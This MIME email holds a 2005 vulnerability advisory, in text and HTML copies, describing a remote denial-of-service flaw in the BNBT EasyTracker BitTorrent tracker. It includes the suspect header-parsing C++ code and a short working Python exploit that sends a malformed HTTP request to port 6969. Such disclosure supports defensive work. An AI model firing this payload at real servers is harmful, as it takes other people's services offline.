------=_Part_1314_25115579.1125371502728
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
BNBT EasyTracker Remote Denial of Service Vulnerability
by Sowhat
Last Update:2005.08.30
http://secway.org/advisory/AD20050830.txt
Vendor:
http://bnbteasytracker.sourceforge.net/
Product Affected:
7.7r3.2004.10.27 and below
Overview:
BNBT was written by Trevor Hogan. BNBT is a complete port=20
of the original Python BitTorrent tracker to C++ for speed
and efficiency. BNBT also offers many additional features
beyond the original Python BitTorrent tracker, plus it's=20
easy to use and customizable. BNBT is covered under the GNU
Lesser General Public License (LGPL).
A Denial of Service vulnerability exists within BNBT which
allows for an attacker to cause the BNBT to stop responding.=20
Details:
A specifically crafted HTTP request will cause the BNBT=20
Server stop responding.
Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
will reproduce the problem. It seems that the bug is located
in client.cpp, "//grab headers" section. And it is something
like " 1-2 =3D -1" and similar to memcpy(-1) ?=20
// grab headers
string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n" );
string :: size_type iDoubleNewLine =3D m_strReceiveBuf.find( "\r\n\r\n" );
strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),=20
iDoubleNewLine - iNewLine - strlen( "\r\n" ) );
while( 1 )
{
string :: size_type iSplit =3D strTemp.find( ":" );
string :: size_type iEnd =3D strTemp.find( "\r\n" );
if( iSplit =3D=3D string :: npos )
{
UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );
break;
}
string strKey =3D strTemp.substr( 0, iSplit );
string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit =
-=20
strlen( "\r\n" ) );//Bug here ??
rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );
strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" ) );
if( iEnd =3D=3D string :: npos )
break;
}
However, I am not quite sure about that and it seems that
it is only a D.O.S so I havnt deep into it.=20
=20
Exploit:
//BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discoverd and coded by Sowhat
# http://secway.org
# Version 7.7r3.2004.10.27 and below
# the BNBT project: http://bnbteasytracker.sourceforge.net/
import sys
import string
import socket
if (len(sys.argv) !=3D 2):
print "\nUsage: " + sys.argv[0] + " TargetIP\n"
print "##################################################################"
print "# #"
print "# BNBT EasyTracker Remote D.O.S Exploit #"
print "# Bug discoverd and coded by Sowhat #"
print "# http://secway.org #"
print "##################################################################"
sys.exit(0)
host =3D sys.argv[1]
port =3D 6969
payload =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
s.send(payload)
WORKAROUND:
No WORKAROUND this time.
plz check the vendor's website for update
Maybe there will be a patch later (?)
Vendor Response:
2005.08.22 Vendor notified via Webform,no email found=20
2005.08.30 Vendor no response. Advisory Released
"Life is like a bug, Do you know how to exploit it ?"
------=_Part_1314_25115579.1125371502728
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
<p>BNBT EasyTracker Remote Denial of Service Vulnerability</p>
<p>by Sowhat</p>
<p>Last Update:2005.08.30</p>
<p><a href=3D"http://secway.org/advisory/AD20050830.txt">http://secway.org/=
advisory/AD20050830.txt</a></p>
<p>Vendor:</p>
<p><a href=3D"http://bnbteasytracker.sourceforge.net/">http://bnbteasytrack=
er.sourceforge.net/</a></p>
<p>Product Affected:</p>
<p>7.7r3.2004.10.27 and below</p>
<p>Overview:</p>
<p>BNBT was written by Trevor Hogan. BNBT is a complete port <br>of the ori=
ginal Python BitTorrent tracker to C++ for speed<br>and efficiency. BNBT al=
so offers many additional features<br>beyond the original Python BitTorrent=
tracker, plus it's=20
<br>easy to use and customizable. BNBT is covered under the GNU<br> Le=
sser General Public License (LGPL).</p>
<p>A Denial of Service vulnerability exists within BNBT which<br>allows for=
an attacker to cause the BNBT to stop responding. </p>
<p>Details:</p>
<p>A specifically crafted HTTP request will cause the BNBT <br>Server stop =
responding.</p>
<p>Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"<=
br>will reproduce the problem. It seems that the bug is located<br>in clien=
t.cpp, "//grab headers" section. And it is something<br>like &quo=
t; 1-2 =3D -1" and similar to memcpy(-1) ?=20
</p>
<p>// grab headers</p>
<p> string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n&=
quot; );<br> string :: size_type iDoubleNewLine =3D m_strReceiveBuf.fi=
nd( "\r\n\r\n" );</p>
<p> strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n&=
quot; ), iDoubleNewLine - iNewLine - strlen( "\r\n" ) );</p>
<p> while( 1 )<br> {<br> string :: size_type iSplit =
=3D strTemp.find( ":" );<br> string :: size_type iEnd =
=3D strTemp.find( "\r\n" );</p>
<p> if( iSplit =3D=3D string :: npos )<br> {<br> =
; UTIL_LogPrint( "client warning - malformed HTTP request (=
bad header)\n" );</p>
<p> break;<br> }</p>
<p> string strKey =3D strTemp.substr( 0, iSplit );<br> &nbs=
p;string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iE=
nd - iSplit - strlen( "\r\n" ) );//Bug here ??</p>
<p> rqst.mapHeaders.insert( pair<string, string>( strKey, =
strValue ) );</p>
<p> strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" =
) );</p>
<p> if( iEnd =3D=3D string :: npos )<br> break;=
<br> }</p>
<p>However, I am not quite sure about that and it seems that<br>it is only =
a D.O.S so I havnt deep into it. <br> </p>
<p>Exploit:</p>
<p>//BNBTDOS.py<br># BNBT EasyTracker Remote D.O.S Exploit<br># Bug discove=
rd and coded by Sowhat<br># <a href=3D"http://secway.org/">http://secway.or=
g</a></p>
<p># Version 7.7r3.2004.10.27 and below<br># the BNBT project: <a hre=
f=3D"http://bnbteasytracker.sourceforge.net/">http://bnbteasytracker.source=
forge.net/</a><br> <br>import sys<br>import string<br>import socket</p=
>
<p>if (len(sys.argv) !=3D 2):<br> print "\nUsage: " + sys.ar=
gv[0] + " TargetIP\n"<br> print "######################=
############################################"<br> print "#&n=
bsp;  =
; &n=
bsp;  =
; &n=
bsp;  =
; #"
<br> print "# &nbs=
p; BNBT EasyTracker Remote D.O.S Exploit  =
; #"<br>&n=
bsp;print "# &nbs=
p; Bug discoverd and coded by Sowhat &nb=
sp; =
#"<br> print "# &n=
bsp; <a href=3D"http://secway.org/">
http://secway.org</a> =
&nb=
sp; #"<br>=
print "#########################################################=
#########"<br> sys.exit(0)</p>
<p>host =3D sys.argv[1]<br>port =3D 6969</p>
<p><br>payload =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"</=
p>
<p>s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM)<br>s.connect((hos=
t,port))<br>s.send(payload)</p>
<p><br>WORKAROUND:</p>
<p>No WORKAROUND this time.<br>plz check the vendor's website for update<br=
>Maybe there will be a patch later (?)</p>
<p>Vendor Response:</p>
<p>2005.08.22 Vendor notified via Webform,no email found <br>2005.08.30 Ven=
dor no response. Advisory Released</p>
<p>"Life is like a bug, Do you know how to exploit it ?"</p>
<p><br> </p>
------=_Part_1314_25115579.1125371502728--